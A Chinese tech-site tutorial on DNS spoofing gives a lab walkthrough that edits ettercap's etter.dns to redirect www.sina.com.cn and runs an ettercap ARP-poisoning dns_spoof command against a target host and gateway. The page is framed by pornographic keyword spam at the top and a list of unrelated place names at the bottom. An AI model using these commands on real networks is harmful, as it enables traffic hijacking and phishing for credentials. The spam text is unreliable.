亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

DNS欺騙攻擊

發布時間:2022-01-04 10:23:58 來源:億速云 閱讀:133 作者:柒染 欄目:大數據

這篇文章將為大家詳細講解有關DNS欺騙攻擊,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

     DNS欺騙攻擊: 目標將其DNS請求發送到攻擊者這 里,然后攻擊者偽造DNS響應,將正確的IP地址替換為其他IP,之后你就登陸了這個攻擊者指定的IP,而攻擊者早就在這個IP中安排好了一個偽造的網站 如某銀行網站,從而騙取用戶輸入他們想得到的信息,如銀行賬號及密碼等,這可以看作一種網絡釣魚攻擊的一種方式。

1、使用另一臺kali linux 作為攻擊靶機,查看主機IP 地址 :192.168.127.211 ,網關地址為:192.168.127.2 , 正常執行:ping www.sina.com.cn可以看到解析的地址為:183.232.24.222;

DNS欺騙攻擊

2、 使用kali 進行攻擊,查看攻擊者機ip地址:192.168.127.208,修改ettercap配置文件:vim /etc/ettercap/etter.dns,

DNS欺騙攻擊

3 、增加一條新的A紀錄,將www.sina.com.cn 解析指向攻擊者主機,保存退出;

DNS欺騙攻擊

4、開始進行DNS欺騙攻擊:ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2// ;

DNS欺騙攻擊

5、進行DNS 欺騙后,再次測試:ping www.sina.com.cn ,發現將www.sina.com.cn 解析指向了攻擊者主機(192.168.127.208)
 

DNS欺騙攻擊

成功執行DNS 欺騙攻擊,到此結束!!!

關于DNS欺騙攻擊就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節
推薦閱讀:
  1. 防止ARP欺騙
  2. arp欺騙

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

齐河县| 堆龙德庆县| 麻江县| 丹棱县| 富宁县| 菏泽市| 抚宁县| 江津市| 海林市| 仲巴县| 敖汉旗| 儋州市| 融水| 宁都县| 水城县| 房产| 嘉兴市| 乳山市| 汕尾市| 腾冲县| 三穗县| 通海县| 定安县| 苗栗县| 富平县| 特克斯县| 裕民县| 尉犁县| 江城| 思南县| 普宁市| 哈尔滨市| 英超| 新乡市| 清河县| 墨竹工卡县| 荔浦县| 顺义区| 高青县| 仪陇县| 三江|